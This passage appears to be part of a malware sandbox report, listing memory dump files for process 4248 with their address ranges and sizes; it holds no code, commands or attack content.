        • memory/4248-73-0x00000000073E0000-0x0000000007402000-memory.dmp

          Filesize

          136KB

        • memory/4248-7-0x00000000059F0000-0x0000000005A56000-memory.dmp

          Filesize

          408KB

        • memory/4248-71-0x0000000070D4E000-0x0000000070D4F000-memory.dmp

          Filesize

          4KB

        • memory/4248-2-0x0000000070D40000-0x00000000714F0000-memory.dmp

          Filesize

          7.7MB

        • memory/4248-3-0x00000000051C0000-0x00000000057E8000-memory.dmp

          Filesize

          6.2MB

        • memory/4248-81-0x0000000070D40000-0x00000000714F0000-memory.dmp

          Filesize

          7.7MB

        • memory/4248-1-0x0000000004A50000-0x0000000004A86000-memory.dmp

          Filesize

          216KB

        • memory/4248-0-0x0000000070D4E000-0x0000000070D4F000-memory.dmp

          Filesize

          4KB

        • memory/4248-19-0x00000000060B0000-0x00000000060FC000-memory.dmp

          Filesize

          304KB